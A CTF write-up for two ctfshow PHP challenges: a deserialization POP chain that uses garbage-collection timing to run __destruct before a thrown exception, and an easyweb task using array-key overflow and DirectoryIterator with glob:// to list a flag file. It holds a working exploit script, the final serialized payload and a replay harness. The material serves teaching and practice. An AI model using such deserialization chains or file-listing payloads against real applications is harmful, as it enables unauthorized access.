Ctfshow [King’s Cup] (Part I)

Time: 2022-5-3

The competition ended back at the end of February. I have wanted to write this WP for a long time, but there were many knowledge points I had not written up yet, so it has been delayed until now.

easy unserialize

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    Throw new exception ("high school freshman report");
} else {
    highlight_file(__FILE__);
}

This challenge has a lot of obscure knowledge worth learning. Let's have a look.

There are three classes, and the pop chain can be spotted at a glance; the throw new Exception(); right after the unserialize() told me I had to use the GC recovery mechanism: an uncaught exception makes PHP mark every object as already destructed before bailing out, so __destruct() is never called at the end of the script, and the object has to be released inside unserialize() itself for its destructor to run. If you do not yet know how to construct a pop chain, or what GC recovery is, see the articles I wrote earlier:

Serialization and deserialization of PHP (pop chain)_ Errorr0's blog
On the utilization of GC recovery mechanism in PHP_ Errorr0's blog

One of the harder points of this challenge for me was that the pop chain is hard to piece together: it cannot be seen at a glance. In that situation my approach is to pick a magic method, then analyze how execution reaches it and where it goes from there.

First analyze some unpopular knowledge.

The first obscure point

How the parameters of __call($func, $args) and __get($name) are controlled:

<?php
// Test: which values end up in the parameters of __get() and __call().
class errorr0 {
    public $object;

    public function __construct()
    {
        $this->object = new errorr1();
        echo "__construct()\n";
        $this->object->string1;             // errorr1 has no $string1 -> errorr1::__get("string1")
    }
}
class errorr1 {
    public $filename;
    public function __get($a)
    {
        $this->filename = new errorr2();
        echo "__get()\n";
        echo $a."\n";                       // the name of the inaccessible property: string1
        $this->filename->function1("bbb");  // errorr2 has no function1() -> errorr2::__call("function1", ["bbb"])
    }
}
class errorr2 {
    private $string;

    public function __call($a,$b)
    {
        echo "__call()\n";
        echo $a."\n";                       // the name of the missing method: function1
        var_dump($b);                       // its arguments, packed into one array
    }
}

$a = new errorr0();

?>


Running it prints, in order: __construct(), __get(), string1, __call(), function1, and then the var_dump of $b, which is array(1) { [0]=> string(3) "bbb" }. So when an inaccessible property is accessed, __get() is called and the property's name is passed as its parameter. __call() works the same way: when a nonexistent or inaccessible method is called, the method name is assigned to __call()'s first parameter, and the arguments of the call are packed into an array and assigned to the second.

The second obscure point

call_user_func() is a common function, but what about the form call_user_func([$this, $func."Me"], $args); where the first parameter is an array? Here is a direct test:


If the first parameter is an array, its first element is used as the object (or class name) and its second element as the method name; any further parameters of call_user_func() are passed on as the method's arguments.
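The callable forms call_user_func() accepts, and what a __call() like second::__call() does with its arguments, as an added example (not code from the challenge or the original write-up; the Gadget class and its method names are made up for the demonstration):

```php
<?php
// Added example, not from the original write-up: callable forms accepted by call_user_func(),
// and what a __call() like second::__call() does with its arguments. Gadget is a made-up class.

class Gadget {
    protected function addMe(...$args) {
        // Report how many arguments arrived and what they were.
        return "addMe got " . count($args) . " argument(s): " . json_encode($args);
    }

    public static function hello($who) {
        return "hello $who";
    }

    // Mirrors second::__call(): the missing method name plus "Me" is looked up on $this, and
    // ALL arguments of the original call arrive packed in one array ($args), which is then
    // handed over as a single parameter.
    public function __call($func, $args) {
        return call_user_func([$this, $func . "Me"], $args);
    }

    // Visibility is checked against the scope call_user_func()/is_callable() runs in:
    // from inside the class a protected method is a valid callback.
    public function canReachAddMe(): bool {
        return is_callable([$this, "addMe"]);
    }
}

// Array callables: [object, "method"] for an instance method, ["Class", "method"] or
// "Class::method" for a static one; any further call_user_func() parameters are the arguments.
echo call_user_func(["Gadget", "hello"], "world"), "\n";
echo call_user_func("Gadget::hello", "world"), "\n";

// __call() packs the arguments: add("x", "y") becomes addMe(["x", "y"]), ONE array argument.
echo (new Gadget())->add("x", "y"), "\n";

// The same [object, "addMe"] callable is rejected from the global scope but accepted inside
// the class, which is why a __call() gadget can reach protected methods like second::addMe().
var_dump(is_callable([new Gadget(), "addMe"]));   // from outside the class
var_dump((new Gadget())->canReachAddMe());         // from inside the class
```

The last two lines are the point for the chain: second::addMe() is protected, but because call_user_func() runs inside second::__call(), the [$this, "addMe"] callback is resolved in second's own scope and the protected method is reachable. Note also that the challenge calls add() with no arguments, so addMe() receives a single empty array.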

The third obscure point

The array_walk() function


The Runoob tutorial has two examples of it that give the general idea. To spell it out: the first parameter of array_walk() is the array to walk, and the second is a callback; the callback's two parameters receive the value and the key of each element respectively. But!! The challenge passes $this, that is, it walks an object: the parameter that would have received the key now receives the property name, and the value parameter receives that property's value. So our move is to make the value an array, so that $fn is an array and $fn[0] is whatever the check needs (here "Happy_func", under a property named year_parm).

The fourth obscure point

Actually this one is obscure and rather far-fetched; it may just have been a pit for me!!


As mentioned earlier, __get() is called when an inaccessible property is accessed, and its parameter is the name of that property; here $name = "string" (one::__toString() reads $this->object->string, and third::$string is private). Now comes the interesting part, $this->$name: one would expect $this->name, but this is a variable property name, and with $name = "string" it ends up as $var = $this->string.

So the final call is $this->string['string'](), and our goal is to make that call one::MeMeMe(). Setting $string = array("string" => [new one(), "MeMeMe"]) does it: $var['string'] is the array [new one(), "MeMeMe"], and since PHP 5.4 an array of the form [object, "method"] is a callable that can be invoked directly with (), so $var[$name]() calls MeMeMe() on that one instance. The official WP does exactly this.

I now understand why it works; it was just the first time I had seen it used this way. Remember that it can be used like this.
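The third and fourth points in isolation, as an added example (not code from the challenge or the original write-up; Target and Dispatcher are made-up stand-ins for one and third, and the result is returned instead of echoed so the effect is visible without the challenge's globals):

```php
<?php
// Added example, not from the original write-up: the two mechanisms that let third::__get()
// land in one::MeMeMe(). Target and Dispatcher are made-up stand-ins for one and third.

class Target {
    public $object = null;                 // walked first (declaration order), so $fn is null here
    public $year_parm = ["Happy_func"];    // walked second: $prev is "year_parm", $fn is this array

    // array_walk() over $this walks the object's properties: the callback gets
    // (property value, property name). The pairs are collected and returned so the
    // effect is visible without the challenge's globals.
    public function walk(): array {
        $seen = [];
        array_walk($this, function ($fn, $prev) use (&$seen) {
            $seen[$prev] = $fn;
            // The challenge indexes $fn[0] unguarded; on the null property that is only a
            // warning (silenced by the @ in __destruct), not an error, so the chain survives.
            if (is_array($fn) && $fn[0] === "Happy_func" && $prev === "year_parm") {
                $seen["hit"] = true;
            }
        });
        return $seen;
    }
}

class Dispatcher {
    private $string;

    public function __construct($string) { $this->string = $string; }

    // $this->$name is a variable property name: with $name === "string" it reads $this->string.
    // $var[$name] is then the array [Target object, "walk"], and since PHP 5.4 such an
    // [object, "method"] array can be invoked directly with (), just like a closure.
    public function __get($name) {
        $var = $this->$name;
        return $var[$name]();
    }
}

$d = new Dispatcher(["string" => [new Target(), "walk"]]);
// $string is private, so reading it from outside the class triggers __get("string").
var_dump($d->string);
```

The dump shows the property names as keys and the property values as values, with "hit" set only for the year_parm entry: that is the whole reason the exp declares year_parm = array(0 => "Happy_func") on the one object placed in the callable.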

Construct exp

Since the difficulties and key points have been analyzed, constructing the exp is simply a matter of stringing those pieces into a pop chain. Briefly: start from one::__destruct(), which calls the nonexistent add() on $this->object to trigger second::__call(); that calls second::addMe() via call_user_func(); addMe() concatenates $this->filename into a string, which triggers one::__toString(); that accesses the inaccessible $this->object->string, reaching third::__get(); and that finally arrives at one::MeMeMe().

The constructed chain is: head --> one::__destruct() --> second::__call() --> second::addMe() --> one::__toString() --> third::__get() --> one::MeMeMe() --> tail

exp:

<?php

// Serialization-only stand-ins for the challenge classes: the methods are not needed to
// build the payload, and the properties are declared public so serialize() writes the plain
// property name (unserialize() on PHP 7.1+ ignores the visibility declared by the real class
// and stores the value in the protected/private slot anyway).
class one {
    public $object;

    public $year_parm = array(0=>"Happy_func");   // what MeMeMe() checks: $fn[0] === "Happy_func" under key year_parm

}

class second {
    public $filename;

}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

$a = new one();
$b = new one();
$c = new second();
$d = new third(["string"=>[new one(),"MeMeMe"]]);   // third::__get("string") -> $var["string"]() -> one::MeMeMe()

$a->object = $c;     // one::__destruct()  -> $c->add()      -> second::__call()
$c->filename = $b;   // second::addMe()    -> "..." . $b     -> one::__toString()
$b->object = $d;     // one::__toString()  -> $d->string     -> third::__get()

$n = NULL;
$m = array(0=>$a,1=>$n);   // the key 1 is changed to 0 by hand afterwards, so the second element overwrites $a


echo serialize($m);


The two squares in the serialized output are invisible characters, which I mentioned in the earlier pop chain article: they are the null bytes surrounding the class name in the private property name \0third\0string, written as %00 in the URL.

Change the key 1 of the last element to 0 to achieve the GC utilization: the second element then overwrites the first, the outer one object is released, and its __destruct() runs inside unserialize(), before the throw is reached.

The final string is:

a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"%00third%00string";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";N;s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeMe";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}
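To check the chain locally, the following harness (an added example, not part of the original write-up or the challenge) replays exactly this string against the challenge's own three classes. HappyYear.php is not available, so $talk and $flag are stubbed with constructed values; the #[\AllowDynamicProperties] line is the only addition to the classes and only keeps PHP 8.2+ from complaining about the dynamic year_parm property. It needs PHP 7.1 or later, because the payload uses the public-form key "filename" for a protected property.

```php
<?php
// Added example, not part of the original write-up or the challenge: a local harness that
// replays the final payload against the challenge's own three classes. HappyYear.php is not
// available, so $talk and $flag are stubbed with constructed values.
$talk = "Happy New Year";               // constructed stand-in for HappyYear.php
$flag = "ctfshow{constructed_flag}";    // constructed stand-in, not the real flag

#[\AllowDynamicProperties]  // keeps PHP 8.2+ quiet about the dynamic year_parm property; a comment on PHP 7
class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

// The write-up's final string, decoded the way the web server decodes the %00 bytes.
// The last element reuses key 0, so it overwrites the outer `one`, which is released and has
// its __destruct() run before unserialize() returns, i.e. before the challenge's throw.
$payload = str_replace('%00', "\0",
    'a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";'
  . 'O:5:"third":1:{s:13:"%00third%00string";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";N;'
  . 's:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeMe";}}}s:9:"year_parm";a:1:{i:0;'
  . 's:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}');

// After the flag is echoed, one::__toString() returns null: a TypeError on PHP 8, a recoverable
// fatal error on PHP 7. Turn the latter into an exception so the harness survives it.
set_error_handler(function (int $no, string $msg) {
    if ($no === E_RECOVERABLE_ERROR) {
        throw new ErrorException($msg, 0, $no);
    }
    return false;   // everything else (the @-suppressed warnings) goes to the default handler
});

try {
    unserialize($payload);
    $note = "returned normally";
} catch (Throwable $e) {
    $note = get_class($e) . ": " . $e->getMessage();
}
// The flag line above was printed from inside unserialize(); only now would the challenge reach its throw.
echo "\n[harness] unserialize() finished ($note)\n";
```

The order of the output is the proof: $talk and the flag appear first, printed from inside unserialize(), and the harness line comes afterwards. The errors reported in that line (the null return from __toString() and the add() calls made by the remaining destructors while the objects are torn down) all happen after the flag has already been echoed, which is why the challenge still leaks it.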


easyweb

Array key overflow + file reading with PHP native classes. There is quite a lot to know about the native classes; I'll supplement that in later notes. The file-operation classes tested here can be found on Baidu.


The front-end source has a hint, source; accessing it shows the source code.


Pay attention to one problem. The first layer is here:


This is an equals sign, i.e. an assignment. For the array not to be assigned to, it is fine if the key overflows. You can see that the previous statement has ++$c, so we set c to the integer maximum minus 1; after it increments, the overflow effect is achieved and the assignment does not happen. But I don't know why I could not achieve this effect on 127.0.0.1; it can be tested on the server.


Very clear: just set c = 9223372036854775806 (PHP_INT_MAX minus 1) and adding one overflows.
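What that overflow does in PHP, as an added example (the easyweb source appears only in the screenshots here, so this is a stand-alone demonstration of the primitive, not the challenge code). It assumes, and this is an assumption, that the guarded statement in the challenge is an append of the form $arr[] = ...: once the array holds the key PHP_INT_MAX there is no next index, so the append fails while every other assignment still works.

```php
<?php
// Added example, not the easyweb source (which appears only as a screenshot in the write-up):
// the PHP array-key overflow primitive. Assumption: the guarded statement in the challenge is
// an append of the form $arr[] = ..., which is the form this primitive defeats.

function keyOverflow($c): array {
    $arr = [];
    $arr[++$c] = "first";   // with $c = 9223372036854775806 the key becomes PHP_INT_MAX
    try {
        // The append needs PHP_INT_MAX + 1 as its index, which no integer can hold:
        // PHP 8 throws Error "Cannot add element to the array as the next element is
        // already occupied"; PHP 7 emits a warning and silently skips the assignment.
        @$arr[] = "second";
    } catch (Error $e) {
        // fall through: $arr still has one element
    }
    return [
        "key"      => $c,                 // PHP_INT_MAX, still an int
        "overflow" => is_float($c + 1),   // one more step and PHP switches to float
        "appended" => count($arr) === 2,  // did the $arr[] = ... assignment happen?
    ];
}

var_dump(keyOverflow(9223372036854775806));   // the value the write-up uses
var_dump(keyOverflow(5));                     // an ordinary key for comparison
```

With the write-up's value the key lands on PHP_INT_MAX and "appended" is false on both PHP 7 and PHP 8; with an ordinary key the append succeeds. The two branches differ only in how loudly PHP refuses (warning versus Error), which is worth knowing when a local test "does not reproduce" the server's behaviour.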

 

Next is PHP native class file reading.

DirectoryIterator: provides a simple interface for viewing the contents of filesystem directories.
FilesystemIterator: filesystem iterator.
GlobIterator: iterates the filesystem in a way similar to glob().

Just use one of them; I won't elaborate on usage, Baidu it directly.

The file name here has an MD5 appended. Although it could be brute-forced with Burp, the WP's use of a glob pattern to match it is very clever, so I'll be lazy and copy it directly.

&a=DirectoryIterator&b=glob://flag[a-z0-9]*.php
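The listing step, as an added example (not the WP's own code): DirectoryIterator opened on a glob:// URL walks only the names matching the pattern, which is what turns the unknown MD5 suffix into a single request. The directory and file names below are constructed so the script runs offline; the hex suffix is made up.

```php
<?php
// Added example, not the WP's own code: the listing step done with DirectoryIterator on a
// glob:// URL, which walks only the names matching the pattern. The directory and file
// names are constructed so the script runs offline; the hex suffix is made up.

function findFlagFiles(string $dir, string $pattern = "flag[a-z0-9]*.php"): array {
    $found = [];
    // glob:// is a stream wrapper: the iterator yields the glob's matches, not a whole directory.
    foreach (new DirectoryIterator("glob://" . $dir . "/" . $pattern) as $entry) {
        $found[] = $entry->getFilename();
    }
    sort($found);
    return $found;
}

// Constructed fixture: one "flag<md5>.php" plus decoys that the pattern must not match
// (no .php suffix, or a character outside [a-z0-9] right after "flag").
$dir = sys_get_temp_dir() . "/easyweb_demo_" . getmypid();
mkdir($dir);
file_put_contents("$dir/flage99a18c428cb38d5f260853678922e03.php", "<?php // constructed, not the real flag\n");
file_put_contents("$dir/flag.txt", "decoy\n");
file_put_contents("$dir/flag_notes.php", "<?php // decoy\n");
file_put_contents("$dir/index.php", "<?php // decoy\n");

$matches = findFlagFiles($dir);   // the names the &a=DirectoryIterator&b=glob://... request would list
print_r($matches);
foreach ($matches as $name) {
    echo file_get_contents("$dir/$name");   // the WP's last step: read the file directly
}

// clean up the fixture
foreach (new DirectoryIterator($dir) as $e) {
    if ($e->isFile()) {
        unlink($e->getPathname());
    }
}
rmdir($dir);
```

Only the constructed flag file survives the pattern: flag_notes.php is rejected because "_" is outside [a-z0-9], and flag.txt because of the suffix. On the challenge the same pattern is supplied through b=, and the listed name is then read directly.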


Finally, read it directly.
